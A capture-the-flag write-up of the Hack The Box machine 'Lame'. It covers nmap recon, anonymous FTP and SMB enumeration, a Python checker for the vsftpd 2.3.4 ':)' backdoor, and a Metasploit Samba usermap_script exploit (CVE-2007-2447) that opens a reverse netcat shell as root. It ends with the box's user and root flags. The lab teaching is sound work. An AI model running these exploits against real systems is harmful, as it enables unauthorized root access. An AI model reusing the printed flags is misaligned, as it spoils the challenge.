HTB: Lame

Overview

Lame, as its name suggests, is a very easy box. The services running on it are old, and one of them has a known CVE that gives a root shell directly.

Recon

nmap

# Nmap 7.94SVN scan initiated Tue Jul 23 10:55:09 2024 as: nmap -sSCV -vv -oA nmap/lame 10.10.10.3
Nmap scan report for 10.10.10.3 (10.10.10.3)
Host is up, received echo-reply ttl 63 (0.019s latency).
Scanned at 2024-07-23 10:55:15 +08 for 57s
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|   2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-22T22:48:00-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h52m26s, deviation: 2h49m45s, median: -7m36s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 58198/tcp): CLEAN (Timeout)
|   Check 3 (port 40169/udp): CLEAN (Timeout)
|   Check 4 (port 51269/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 23 10:56:12 2024 -- 1 IP address (1 host up) scanned in 63.16 seconds

The nmap results show that every exposed service is old. The SSH banner (OpenSSH 4.7p1 Debian 8ubuntu1) is the package that Ubuntu 8.04 (Hardy Heron) shipped in 2008, and the port 445 banner pins Samba to 3.0.20-Debian. Also worth noting: SMB message signing is disabled, and only four of the top 1000 TCP ports answered, the rest being filtered.

FTP (TCP 21)

$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir -a
229 Entering Extended Passive Mode (|||11407|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

Anonymous FTP is allowed but there are no files available here.

vsftpd 2.3.4 is the version whose source tarball was trojaned on the project's download site in mid-2011: in the backdoored build, a username containing ":)" makes the daemon spawn a root shell listening on TCP 6200. The version banner alone does not prove this particular binary carries the backdoor, so I'll use Metasploit to check quickly.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.

[*] Exploit completed, but no session was created.

The trigger username was accepted (331) but nothing answered on TCP 6200, so no session was created. Either this build does not carry the backdoor (it was likely patched out manually) or the bind port is not reachable; the banner cannot distinguish the two cases.
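The Metasploit module is a thin wrapper around a four-message exchange, and it is worth seeing that exchange written out. The following is an added example, not code from the post or from vsftpd: it sends the USER trigger, does not wait on the PASS reply, and then probes the bind port, which is the same order the module uses. The FakeVsftpd class is a constructed stand-in so the script runs offline; the "probe" username and the fake's port numbers are arbitrary, while 6200 is the port the real trojan bound before attaching /bin/sh to whoever connected.

```python
import socket
import threading

BACKDOOR_PORT = 6200  # where the trojaned vsftpd 2.3.4 build listens


def check_vsftpd_backdoor(host, port=21, bind_port=BACKDOOR_PORT, timeout=3.0):
    """Send the ':)' trigger, then probe the bind port.

    This is the same sequence exploit/unix/ftp/vsftpd_234_backdoor performs.
    Returns a dict: the greeting banner, whether the USER line got a 331, and
    whether anything accepted a connection on bind_port afterwards.
    """
    result = {"banner": "", "user_accepted": False, "bind_port_open": False}
    with socket.create_connection((host, port), timeout=timeout) as ctl:
        rd = ctl.makefile("rb")
        result["banner"] = rd.readline().decode(errors="replace").strip()
        # Any name works; the ":)" is what the trojaned build scans for.
        ctl.sendall(b"USER probe:)\r\n")
        reply = rd.readline().decode(errors="replace").strip()
        result["user_accepted"] = reply.startswith("331")
        # The password is irrelevant, and a hijacked daemon may never answer
        # it, so send it and move straight on to the bind port.
        ctl.sendall(b"PASS probe\r\n")
    try:
        with socket.create_connection((host, bind_port), timeout=timeout):
            result["bind_port_open"] = True
    except OSError:
        pass
    return result


def verdict(result):
    """One-line reading of check_vsftpd_backdoor()'s result."""
    if result["bind_port_open"]:
        return "backdoor present: listener up on bind port"
    if result["user_accepted"]:
        return "trigger accepted, no listener: clean or patched build, or port filtered"
    return "USER rejected before the trigger could fire"


class FakeVsftpd:
    """Constructed stand-in for vsftpd so the check can run offline.

    It speaks just enough FTP for the probe. With trojaned=True it imitates
    the backdoor: a ':)' in USER makes it open a listener on bind_port
    (the real trojan bound 6200 and attached /bin/sh to whoever connected).
    """

    def __init__(self, trojaned):
        self.trojaned = trojaned
        self.ctl = socket.socket()
        self.ctl.bind(("127.0.0.1", 0))
        self.ctl.listen(1)
        self.port = self.ctl.getsockname()[1]
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))
        self.bind_port = self.shell.getsockname()[1]
        if not trojaned:
            self.shell.close()  # clean build: nothing will ever listen here
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.ctl.accept()
        with conn:
            try:
                rd = conn.makefile("rb")
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                user = rd.readline()
                if self.trojaned and b":)" in user:
                    self.shell.listen(1)  # the "backdoor" opens here
                conn.sendall(b"331 Please specify the password.\r\n")
                rd.readline()  # PASS
                conn.sendall(b"530 Login incorrect.\r\n")
            except OSError:
                pass  # client went away; nothing to clean up


if __name__ == "__main__":
    for trojaned in (False, True):
        srv = FakeVsftpd(trojaned)
        r = check_vsftpd_backdoor("127.0.0.1", srv.port, srv.bind_port)
        print(f"trojaned={trojaned}: {r['banner']} -> {verdict(r)}")
```

Against the box, `check_vsftpd_backdoor("10.10.10.3")` lands in the middle case, user_accepted with no listener, which is the same outcome as the module run above. The function deliberately does not claim "patched" in that case, because a firewalled 6200 looks identical from the outside.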

SMB (TCP 445)

$ smbclient -N -L  \\10.10.10.3   
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

Anonymous login is allowed and we have several shares available to us. I’ll use smbmap to see which shares I have access to.

$ smbmap -u '' -p '' -H 10.10.10.3
...[SNIP]...
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

Only the tmp share is accessible anonymously, and it is writable as well as readable.

$ smbclient -N \\\\10.10.10.3\\tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  3 19:46:13 2024
  ..                                 DR        0  Sat Oct 31 14:33:58 2020
  5582.jsvc_up                        R        0  Sat Aug  3 18:54:32 2024
  .ICE-unix                          DH        0  Sat Aug  3 18:53:31 2024
  vmware-root                        DR        0  Sat Aug  3 18:53:45 2024
  .X11-unix                          DH        0  Sat Aug  3 18:53:57 2024
  .X0-lock                           HR       11  Sat Aug  3 18:53:57 2024
  vgauthsvclog.txt.0                  R     1600  Sat Aug  3 18:53:29 2024

The listing looks like the host's /tmp (X11 and VMware lock files), and only one file has any content. Looking at it:

vgauthsvclog.txt.0

[Jul 22 15:53:25.344] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Jul 22 15:53:25.344] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Jul 22 15:53:25.344] [ message] [VGAuthService] Group 'service'
[Jul 22 15:53:25.344] [ message] [VGAuthService]         samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Jul 22 15:53:25.344] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Jul 22 15:53:25.373] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Jul 22 15:53:25.373] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Jul 22 15:53:25.373] [ message] [VGAuthService] Group 'service'
[Jul 22 15:53:25.373] [ message] [VGAuthService]         samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Jul 22 15:53:25.373] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Jul 22 15:53:25.373] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
[Jul 22 15:53:25.373] [ message] [VGAuthService] INIT SERVICE
[Jul 22 15:53:25.373] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
[Jul 22 15:53:25.412] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
[Jul 22 15:53:25.430] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
[Jul 22 15:53:25.430] [ message] [VGAuthService] BEGIN SERVICE

This is a VMware Tools VGAuthService log (the guest authentication component). Nothing here helps us: looking up the build number online turns up no exploit specific to this build, and the other publicly available VMware Tools exploits only apply to Windows guests.

CVE-2007-2447

Samba 3.0.20 was released in 2005. Versions 3.0.0 through 3.0.25rc3 have a remote command execution bug, CVE-2007-2447: when the non-default "username map script" option is set in smb.conf, smbd builds a shell command line containing the username supplied by the client without escaping it, so shell metacharacters in the name are executed as the smbd user, which is root. No credentials are needed; the injected name rides on an anonymous session setup.

I’ll use metasploit to perform the exploit and get a shell as root on the box.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => 10.10.16.38
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.16.38:4444 
[*] Command shell session 1 opened (10.10.16.38:4444 -> 10.10.10.3:54133) at 2024-08-03 19:58:37 +0800

whoami
root

User: 68ce9971ed9e96c85ca94094316a6210

Root: 0b6aeb6957286e33ed21bb3901817e0c

I guess that’s why the box is called Lame…

This post is licensed under CC BY 4.0 by the author.